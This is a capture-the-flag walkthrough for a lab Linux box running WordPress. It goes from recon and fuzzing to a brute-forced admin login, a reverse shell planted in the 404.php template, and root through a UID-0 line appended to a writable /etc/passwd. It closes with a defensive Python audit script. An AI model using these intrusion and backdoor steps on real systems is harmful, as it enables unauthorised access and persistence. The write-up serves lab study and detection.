[*] INDEX:
[+] BOX INFO 💻 :
Operating System : Linux 🐧
Difficulty : Medium 🌓
Owner : Dosk3n
IP : 10.10.10.46
[+] PART 1 - GAIN ACCESS
The first step is scanning the machine's ports with nmap:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Having found the open ports, let's run a deeper scan:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
| 256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
|_ 256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apocalypse Preparation Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here the only thing worth noting is the HTTP server, so let's check it:
We can see a WordPress site, so first and foremost, let's run wpscan:
wpscan -e --url http://apocalyst.htb/
Nice, we got the user! Now let's fuzz the site; in my case I'll be using ffuf:
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://apocalyst.htb/FUZZ
But there is nothing interesting… Once I reached this point, I didn't really know what to do, so I tried to create a custom wordlist with the tool cewl:
cewl -w apocalyst.wordlist http://apocalyst.htb/
Once we have the wordlist, let's fuzz the website again; this time I'll be using wfuzz, because it shows the response size in chars:
wfuzz -u http://apocalyst.htb/FUZZ/ -w apocalyst.wordlist --hc 404
We can see that all directories return a total of 157 chars:
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://apocalyst.htb/FUZZ/
Total requests: 532
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 13 L 17 W 157 Ch "the"
000000043: 200 13 L 17 W 157 Ch "from"
000000031: 200 13 L 17 W 157 Ch "End"
000000007: 200 13 L 17 W 157 Ch "Blog"
000000045: 200 13 L 17 W 157 Ch "then"
000000015: 200 13 L 17 W 157 Ch "are"
000000035: 200 13 L 17 W 157 Ch "Assumptio"
So let's filter out responses of that length:
wfuzz -u http://apocalyst.htb/FUZZ/ -w apocalyst.wordlist --hc 404 --hh 157
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://apocalyst.htb/FUZZ/
Total requests: 532
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000455: 200 14 L 20 W 175 Ch "Rightiousness"
Interesting… Let's try some stego:
Actually, I didn't know what it was for, so I tried everything. I tried to brute-force the WordPress login with the username falaraki:
wpscan -U falaraki --url http://apocalyst.htb/ -P list.txt
So, let's log in by visiting /wp-admin:
Now, as usual, let's try to establish a reverse shell:
Let's change the 404.php template to a reverse shell; in my case I'll be using the one from Pentest Monkey.
Now let's visit the site and trigger a 404, but first let's start a listener on our local machine:
Now let's change the URL to http://apocalyst.htb/?p=1000 to trigger the 404 page:
And let's see:
To get a more comfortable shell, let's run:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
stty rows 59 columns 235
[+] PART 2 - PRIVESC
Let's run linpeas.sh.
Let's start a Python HTTP server again and fetch the file:
From our local machine :
From the victim machine :
./linpeas.sh
Wow, so /etc/passwd is writable. In this post everything is quite well explained, so let's add this to /etc/passwd:
From our local machine :
openssl passwd -1
(I typed "pass" as the password)
From the victim machine :
Let's create a user:
echo 'maiky:$1$pCtoMGME$NpDbW6N2knP6pl9SCpag1.:0:0:maiky:/home/astra:/bin/bash' >> /etc/passwd
And then switch to that user:
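As an added defender-side check (not part of the original writeup), the following Python audits /etc/passwd for the two conditions abused on this box: group/world-writable permissions, and an entry that is not root yet carries UID 0 or an inline password hash. The sample file content below is constructed for the example, with a placeholder hash.

```python
import os
import stat
from typing import List

# Constructed sample (not from the box): a normal root entry, a normal user,
# and a backdoor-style entry with a hash in field 2 and UID 0.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
falaraki:x:1000:1000:falaraki:/home/falaraki:/bin/bash
maiky:$1$AAAAAAAA$BBBBBBBBBBBBBBBBBBBBBB:0:0:maiky:/home/astra:/bin/bash
"""


def audit_passwd_content(text: str) -> List[str]:
    """Return findings for suspicious /etc/passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        # A real hash in field 2 means the account bypasses /etc/shadow.
        if pw not in ("x", "*", "!", ""):
            findings.append(f"line {lineno}: user '{name}' has a password hash in /etc/passwd")
        # Any UID-0 account other than root is an extra superuser.
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: user '{name}' has UID 0 but is not root")
    return findings


def group_or_world_writable(mode: int) -> bool:
    """True if the st_mode has the group- or other-write bit set."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_mode(path: str = "/etc/passwd") -> List[str]:
    """Flag the file if anyone but the owner can write it (the linpeas finding here)."""
    mode = os.stat(path).st_mode
    if group_or_world_writable(mode):
        return [f"{path} is writable by group/others (mode {stat.filemode(mode)})"]
    return []


if __name__ == "__main__":
    for finding in audit_passwd_content(SAMPLE_PASSWD) + audit_passwd_mode():
        print(finding)
```

Run it on a host to get both the permission and the content findings; an empty output means neither condition is present.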